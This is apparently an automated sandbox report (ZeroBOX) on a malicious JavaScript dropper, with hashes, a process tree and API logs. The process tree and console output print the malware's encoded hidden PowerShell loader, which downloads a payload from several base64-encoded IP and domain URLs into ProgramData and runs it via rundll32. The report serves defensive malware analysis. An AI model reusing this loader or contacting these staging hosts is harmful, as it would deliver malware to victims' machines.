Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 18, 2023, 9:25 a.m.	May 18, 2023, 9:27 a.m.

Size	213.1KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`106d2d43f2f14aedca98a851814b6619`
SHA256	`b1c5cdb6f87ad0c3aacbf479218ede289571b85d30eb47defef749332b52c806`
CRC32	`C58167BA`
ssdeep	`1536:8KksgqqJbAKqvIeo8iw0Dsf1pr9FrnwNmtjS6q0q7kER8UOvf6bRpfMniIrBTcGG:Dksgqql8Vr9owFBTcJ0AvBOC6R3sVD`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Fyhri.js
3008
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise
  2208
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA"
    2312

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 18, 2023, 9:25 a.m.			0	0

Command line console output was observed (37 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: The term 'Angular' is not recognized as the name of a cmdlet, function, script console_handle: 0x00000023	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: file, or operable program. Check the spelling of the name, or if a path was inc console_handle: 0x0000002f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: luded, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: At line:1 char:2352 console_handle: 0x00000047	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + $flamless = 549;$gasterozooidVindicator = "AmputatedJedcock";$Telescopical = console_handle: 0x00000053	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: "PrelaticalnessCancel";Start-Sleep -Seconds 9;$StraitsmenRhombohedral = 206;$Mo console_handle: 0x0000005f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: skeneer = "aAB0AHQAcAA6AC8ALwAxADUAOAAuADIANQA1AC4AMgAxADMALgAxADgAMQAvAG0AaQBS console_handle: 0x0000006b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AC8AYwBqAGkATABQAHAASQBUAA==uaAB0AHQAcAA6AC8ALwAxADQAOQAuADEANQA0AC4AMQA1ADgALg console_handle: 0x00000077	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: A5ADEALwBYAG4AZAAvAFcAbwBvAEMAagB1AHoASQBCAEQAuaAB0AHQAcAA6AC8ALwAxADYAMgAuADIA console_handle: 0x00000083	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: NQAyAC4AMQA3ADIALgA1ADQALwA5AEcAUQA1AEEAOAAvAE8ATgBPAEsAeQBtAHgAbwBvAG4ARgA=";f console_handle: 0x0000008f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: oreach ($sluglike in $Moskeneer -split "u") {$Dissevers = 660;try {$WabronWooin console_handle: 0x0000009b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: g = "MislivedDiplokaryon";$outthought = "aAB0AHQAcAA6AC8ALwB1AG4AZAByAG8AcwBzAG console_handle: 0x000000a7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: kAbgBlAHMAcwAuAHAAaAB5AHMAaQBvAA==nvrKaAB0AHQAcAA6AC8ALwAyADUAMwAuADIANAAxAC4AM console_handle: 0x000000b3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: gAwADkALgA5ADUAnvrKaAB0AHQAcAA6AC8ALwBvAHMAdABlAG8AcABsAGEAcwB0AGkAZQBzAC4AdABh console_handle: 0x000000bf	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AHgAnvrKaAB0AHQAcAA6AC8ALwB1AG4AaABlAGEAZABlAHIALgBiAGUAZQByAA==";$Chondroclast console_handle: 0x000000cb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: = "aAB0AHQAcAA6AC8ALwBMAGkAcABvAGwAeQBzAGUAcwAuAGMAaQB0AHkA";$Pioned = [System console_handle: 0x000000d7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: .Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($sluglike console_handle: 0x000000e3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ));iwr $Pioned -O C:\ProgramData\vatfulSystemiser.upgirdsBacklists;$fastus = "a console_handle: 0x000000ef	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AB0AHQAcAA6AC8ALwAyADEAMAAuADcAOQAuADIAMAAxAC4ANQA0AA==";$nonvacuousnessTucuna console_handle: 0x000000fb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: = "aAB0AHQAcABzADoALwAvADYANQAuADkAMAAuADEAOAAzAC4AMQA1ADgAdvaAB0AHQAcAA6AC8ALw console_handle: 0x00000107	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AyADMAMAAuADIANAA3AC4AMQA3ADAALgAyADAANwA=dvaAB0AHQAcABzADoALwAvAFYAZQBsAG8AdQB console_handle: 0x00000113	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: yAFQAaQBmAGYAZQBkAC4AdABvAA==";$turpentinicAntimonarchal = "Bridaler";if ((Get- console_handle: 0x0000011f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: Item -Path C:\ProgramData\vatfulSystemiser.upgirdsBacklists).Length -ge 166523) console_handle: 0x0000012b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: {powershell -encodedcommand "cwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAQwA6AFwAUA console_handle: 0x00000137	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAc console_handle: 0x00000143	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIA console_handle: 0x0000014f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: dgBlAHIAOwBBAG4AZwB1AGwAYQByAA==";$imperforatedRepented = "aAB0AHQAcAA6AC8ALwBF console_handle: 0x0000015b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AHEAdQBpAGcAcgBhAG4AdQBsAGEAcgAuAHAAbwBrAGUAcgA=MoevaAB0AHQAcAA6AC8ALwAxADcANgA console_handle: 0x00000167	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: uADEANwA0AC4AMQAyADMALgAxADUAMwA=MoevaAB0AHQAcABzADoALwAvAEsAaQB0AGUAZgBsAHkAaQ console_handle: 0x00000173	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: BuAGcALgBnAHIAMoevaAB0AHQAcABzADoALwAvAHAAYQBwAGUAcgBiAG8AeQBQAHIAZQBzAHAAbwBuA console_handle: 0x0000017f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: HQAYQBuAGUAbwB1AHMAbAB5AC4AYwBsAG8AdQBkAA==";$Adroitest = 44;break;Angular;}Ang console_handle: 0x0000018b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ular;} catch {$ReverterBankable = "aAB0AHQAcAA6AC8ALwA5ADMALgAxADcANgAuADIAMwAz console_handle: 0x00000197	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AC4AMgA1ADIAZaAB0AHQAcAA6AC8ALwAxADIAMAAuADIAMwAzAC4AMQA0ADEALgAyADEANwA=";$Stu console_handle: 0x000001a3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: dfishesCerialia = "preponderate";}}$chondrectomy = 748;Angular <<<< ; console_handle: 0x000001af	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Angular:String) [], CommandNotF console_handle: 0x000001bb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: oundException console_handle: 0x000001c7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000001d3	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6ed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b69d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b6cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
